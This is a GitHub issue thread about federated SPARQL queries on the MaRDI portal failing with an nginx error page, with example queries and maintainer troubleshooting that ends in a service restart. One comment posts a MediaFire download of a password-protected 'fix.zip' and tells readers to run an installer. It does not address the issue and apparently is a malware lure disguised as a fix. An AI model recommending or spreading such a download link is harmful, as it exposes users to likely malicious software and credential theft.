### ISSUE TITLE
Federated queries on the MaRDI endpoint yield nginx error

### ISSUE THREAD

**Issue by Daniel-Mietchen** [MaRDI4NFDI/portal-compose#552]
**Describe the bug**

This is the error message:

```HTML
<!DOCTYPE html>
<html>
<head>
<title>Error</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>An error occurred.</h1>
<p>Sorry, the page you are looking for is currently unavailable.<br/>
Please try again later.</p>
<p>If you are the system administrator of this resource then you should check
the error log for details.</p>
<p><em>Faithfully yours, nginx.</em></p>
</body>
</html>
```

**Expected behavior**

The queries should run without errors and give useful results, as they did before.

**To Reproduce**
1. Run a SPARQL query that federates MaRDI with Wikidata ([example](https://query.portal.mardi4nfdi.de/#%23%20This%20query%20produces%20statements%20for%0A%23%20https%3A%2F%2Fquickstatements.portal.mardi4nfdi.de%2F%23%2Fbatch%2Fnew%0A%23%20Help%3A%20https%3A%2F%2Fwww.wikidata.org%2Fwiki%2FHelp%3AQuickStatements%20.%0A%0APREFIX%20wdt%3A%20%3Chttps%3A%2F%2Fportal.mardi4nfdi.de%2Fprop%2Fdirect%2F%3E%0APREFIX%20wd%3A%20%3Chttps%3A%2F%2Fportal.mardi4nfdi.de%2Fentity%2F%3E%0A%0APREFIX%20wikidata_wd%3A%20%3Chttp%3A%2F%2Fwww.wikidata.org%2Fentity%2F%3E%0APREFIX%20wikidata_wdt%3A%20%3Chttp%3A%2F%2Fwww.wikidata.org%2Fprop%2Fdirect%2F%3E%0A%0ASELECT%20DISTINCT%0A%0A%23%23%23%23%23%23%23%0A%23%20To%20get%20the%20QuickStatements%20commands%2C%20comment%20out%20the%20lines%20until%20the%20next%20hash%20line%0A%23%20%3Fmardi_item%0A%23%20%3Fmardi_item_label%0A%23%20%3Fwikidata%0A%23%20%3Fwikidata_label%0A%23%20%3FDOI%0A%23%23%23%23%23%23%23%0A%0A%28REPLACE%28STR%28%3Fmardi_item%29%2C%20%22.%2aQ%22%2C%20%22Q%22%29%20AS%20%3Fmardi_qid%29%20%0A%28%22P12%22%20AS%20%3Fproperty%29%0A%28CONCAT%28%22%5C%22%22%2C%20REPLACE%28STR%28%3Fwikidata%29%2C%20%22.%2aQ%22%2C%20%22Q%22%29%2C%20%22%5C%22%22%29%20AS%20%3Fwikidata_qid%29%20%0A%0AWHERE%20%7B%0A%20%20SERVICE%20bd%3Asample%20%7B%20%3Fmardi_item%20wdt%3AP27%20%3Fdoi%20.%20bd%3AserviceParam%20bd%3Asample.limit%201000%20%7D%0A%20%20BIND%28UCASE%28%3Fdoi%29%20AS%20%3FDOI%29%0A%20%20FILTER%20NOT%20EXISTS%20%7B%20%3Fmardi_item%20wdt%3AP12%20%3FWikidataQID%20%7D%20%0A%20%20service%20%3Chttps%3A%2F%2Fquery.wikidata.org%2Fsparql%3E%20%7B%0A%20%20%20%20%3Fwikidata%20wikidata_wdt%3AP356%20%3FDOI%20.%0A%20%20%20%20%3Fwikidata%20rdfs%3Alabel%20%3Fwikidata_label%20.%0A%20%20%20%20FILTER%20%28LANG%28%3Fwikidata_label%29%20%3D%20%22en%22%29%0A%20%20%7D%0A%20%20%3Fmardi_item%20rdfs%3Alabel%20%3Fmardi_item_label%20.%0A%20%20FILTER%20%28LANG%28%3Fmardi_item_label%29%20%3D%20%22en%22%29%0A%7D%0A%23%20LIMIT%201000)) or FactGrid ([example](https://query.portal.mardi4nfdi.de/#%23title%3A%20Street%20addresses%20of%20historic%20mathematicians%0A%23%20This%20query%20combines%20data%20from%20%0A%23%20https%3A%2F%2Fquery.portal.mardi4nfdi.de%20%28MaRDI%29%0A%23%20and%20https%3A%2F%2Fdatabase.factgrid.de%2F%20%28NFDI4Memory%29%0A%0A%23defaultView%3AMap%0A%0APREFIX%20FactGrid_wd%3A%20%3Chttps%3A%2F%2Fdatabase.factgrid.de%2Fentity%2F%3E%0APREFIX%20FactGrid_wdt%3A%20%3Chttps%3A%2F%2Fdatabase.factgrid.de%2Fprop%2Fdirect%2F%3E%0A%0ASELECT%20DISTINCT%20%0A%20%20%3FFactGrid_mathematician%20%3FFactGrid_mathematicianLabel%20%3FFactGrid_addressLabel%20%3FFactGrid_coord%20%0A%20%20%3FMaRDI_person%20%3FMaRDI_personLabel%20WHERE%20%7B%0A%20%20%3FMaRDI_person%20wdt%3AP316%20%3FFactGrid_personID%20.%0A%20%20BIND%28URI%28CONCAT%28%22https%3A%2F%2Fdatabase.factgrid.de%2Fentity%2F%22%2C%20%3FFactGrid_personID%29%29%20AS%20%3FFactGrid_mathematician%29%0A%20%20SERVICE%20%3Chttps%3A%2F%2Fdatabase.factgrid.de%2Fsparql%3E%20%7B%0A%0A%20%20%20%20SELECT%20%3FFactGrid_mathematician%20%3FFactGrid_mathematicianLabel%20%3FFactGrid_addressLabel%20%3FFactGrid_coord%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20WHERE%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3FFactGrid_mathematician%20FactGrid_wdt%3AP2%20FactGrid_wd%3AQ7%3B%20%20%20%20%20%20%20%23%20person%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20FactGrid_wdt%3AP208%20%3FFactGrid_address.%20%20%23%20address%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3FFactGrid_address%20FactGrid_wdt%3AP48%20%3FFactGrid_coord.%20%20%20%20%20%20%20%20%20%20%20%23%20geocoordinates%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20SERVICE%20wikibase%3Alabel%20%7B%20bd%3AserviceParam%20wikibase%3Alanguage%20%22%5BAUTO_LANGUAGE%5D%2Cen%22.%20%7D%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20LIMIT%20100%20%20%0A%20%20%7D%0A%20%20BIND%28%3FFactGrid_mathematicianLabel%20AS%20%3FmathematicianLabel%29%0A%0A%20%20BIND%28STR%28CONCAT%28%22MaRDI%3A%20%22%2C%20STR%28%3FmathematicianLabel%29%29%29%20AS%20%3FMaRDI_personLabel%29%20%20%0A%7D%0A))
2. See error

**Screenshots**
![Screenshot (1620)](https://github.com/user-attachments/assets/4a04b4e3-a6a8-4aa6-b925-7616cec4675d)

**Additional context**
Non-federated queries ([example](https://tinyurl.com/y62dvn3o)) seem to work as usual.

**Checklist for this issue**: 
- [X] Assignee has been set for this issue 
- [X] All fields of the issue have been filled 
- [X] the main MaRDI project has been assigned as project

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Daniel-Mietchen** [comment]
Here is another ticket on this nginx error, along with some useful comments: https://www.reddit.com/r/devops/comments/abw6ss/nginx_weird_error_help_been_at_this_longer_than/?rdt=33593 .

**Comment by physikerwelt** [comment]
There are two issues. One, the nginx error is not helpful, I would tend to ignore it for now and use the interal SPARQL interface https://wdqs.portal.mardi4nfdi.de/bigdata/#query instead. I started this moments ago, but the query keeps running...

**Comment by physikerwelt** [comment]
Can you maybe provide a minimal example?

**Comment by physikerwelt** [comment]
The queries are still running...

**Comment by physikerwelt** [comment]
I restarted the wdqs service 

[ghcr.io/wmde/wikibase/wdqs:dev-9186217118](https://portainer.portal.mardi4nfdi.de/#!/2/docker/images/ghcr.io~2Fwmde~2Fwikibase~2Fwdqs%3Adev-9186217118)

 and now it works nicely.
![Screenshot 2024-08-26 at 19 59 31](https://github.com/user-attachments/assets/6acc5dda-ad96-4248-bb8b-9a2fc30def3a)
